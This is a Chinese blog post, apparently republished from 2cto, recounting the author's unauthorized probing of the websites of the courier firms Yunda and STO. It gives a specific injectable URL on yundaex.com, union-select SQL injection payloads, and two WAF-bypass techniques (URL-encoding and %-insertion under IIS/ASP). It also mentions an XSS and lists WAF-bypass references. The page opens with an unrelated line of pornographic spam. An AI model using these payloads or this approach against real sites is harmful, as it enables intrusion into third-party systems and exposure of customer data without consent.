自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

快遞廠商的安全小測

作者:qingsh4n
安全
雙十一在淘寶上買了幾件衣服,昨天收到短信說快遞已發(fā)。于是查了下物流訂單詳情,然后順便手賤了下。查看訂單的時候,看到有php頁面,就google了一把:site:yundaex.com inurl:php? ,還很發(fā)現(xiàn)了注入點。

0x01 事起有因

雙十一在淘寶上買了幾件衣服,昨天收到短信說快遞已發(fā)。于是查了下物流訂單詳情,然后順便手賤了下。

0x02 安全問題

A 韻達

查看訂單的時候,看到有php頁面,就google了一把:site:yundaex.com inurl:php? ,還很發(fā)現(xiàn)了注入點。

注入點:

http://www.yundaex.com/fuwuwangdian_list.php?shi=027

數(shù)據(jù)庫:

B 申通

申通的主頁上面直接有新聞,而且都是asp的動態(tài)頁面,就加了個單引號,結(jié)果就報錯了。

很明顯又是一個注入漏洞。然后習慣性的and 1=1,and 1=2,然后就出現(xiàn)了不常見的頁面,可以證明是有waf在作怪。不過該waf沒有組織order by,通過他可以知道前面的查詢有8個字段。現(xiàn)在介紹兩種繞過該waf的方法:

Urlencode編碼

將and 1=2 union select 1,user(),3,4,5,6,version(),8 全部字符都進行urlencode編碼為:%61%6e%64%20%31%3d%32%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%75%73%65%72%28%29%2c%33%2c%34%2c%35%2c%36%2c%76%65%72%73%69%6f%6e%28%29%2c%38,然后提交,數(shù)據(jù)出來了。

解釋:即使將select等關鍵字url編碼后,當請求的鏈接到達服務端后,服務端容器會先給轉(zhuǎn)碼的,然后再交給asp腳本處理。所以在源代碼審計時經(jīng)常會找urldecode等函數(shù),因為這樣可能利用url雙編碼來繞過防注入程序的處理。

Asp環(huán)境添加%

將and 1=2 union select 1,user(),3,4,5,6,version(),8變?yōu)椋篴n%d 1=2union selec%t 1,user(),3,4,5,6,version(),8,然后提交,數(shù)據(jù)又出來了。

解釋:IIS下的asp.dll文件在對asp文件后參數(shù)串進行url解碼時,會直接過濾掉09-0d(09是tab鍵,0d是回車)、20(空格)、%(下兩個字符有一個不是十六進制)字符。

0x03 還是那個waf

申通這個waf當輸入有特殊字符時,會將query字符串輸出來。所以這里就會形成一個xss。

不過這個xss很yy,因為這是在代理下提交的,如果用瀏覽器的,瀏覽器會先給編碼。

0x04 關于waf的資料

http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-henrique.pdf

Playing with Web Application Firewalls

http://pauldotcom.com/2012/01/real-world-waf-detection-and-b.html

Real World WAF Detection and Bypass Made Easy

https://www.owasp.org/images/0/0a/Appseceu09-Web_Application_Firewalls.pdf

Web Application Firewalls:

What the vendors do NOT want

you to know

http://hackerstown.com/showthread.php?tid=20228

[TUT]basic WAF bypassing and intrusiondetection [tut]

http://www.101hacker.com/2011/11/sql-injections-part-5-bypassing-waf.html

SQL InjectionPart 5 – Bypassing WAF

http://ptsecurity.com/download/PT-devteev-CC-WAF-ENG.pdf

Methods to Bypass a Web ApplicationFirewall

http://www.nethemba.com/bypassing-waf.pdf

Bypassing Web Application Firewalls (WAFs)

http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

Bypassing_WAFs_with_SQLMap

Web Application Firewalls: Detection,Bypassing and Exploitation

http://www.andlabs.org/whitepapers/Split_and_Join.pdf

Split_and_Join

http://kyle-sandilands.com/?p=1995

http://www.sectechno.com/2010/05/23/detecting-bypassing-web-application-firewalls-part-1/

DETECTING & BYPASSING WEB APPLICATIONFIREWALLS (PART 1)

https://www.sans.org/security-training/web-application-firewall-filter-bypass-day-4-15936-cid

Web Application Firewall and Filter Bypass

http://www.darkreading.com/security/news/217400819/researchers-hack-web-application-firewalls.html

還有safe3和blackhat上面那個協(xié)議方面繞過的文章,可以自己找下。歡迎補充……

0x05 問題說明

這幾個漏洞應該都存在很長時間了,而且估計千人日了。不過這里只做說明,重點是waf。

責任編輯:藍雨淚 來源: 2cto
waf快遞廠商申通
相關推薦

2014-11-25 11:37:17

壓測 軟件測試

2009-09-25 09:49:29

ConSentry安全廠商網(wǎng)絡安全

2010-03-29 15:54:13

2015-05-18 17:18:37

2017-03-23 13:07:00

小程序DCloud

2021-01-08 16:56:00

紅帽StackRox容器

2010-03-17 16:01:13

2022-11-15 10:19:13

2020-03-27 10:20:05

安全眾測滲透測試網(wǎng)絡安全

2021-03-03 14:40:18

云原生

2015-07-13 10:57:52

2013-07-10 13:54:00

php

2023-03-06 15:15:22

2010-12-07 12:18:33

Juniper虛擬化安全

2016-02-25 16:06:55

工控安全安全廠商

2016-11-28 10:15:26

云計算

2016-03-27 14:04:14

云計算云安全

2025-03-26 11:27:04

2015-11-09 11:29:36

快遞實名制個人信息安全

2010-09-02 09:07:11

云計算安全
點贊
收藏

51CTO技術棧公眾號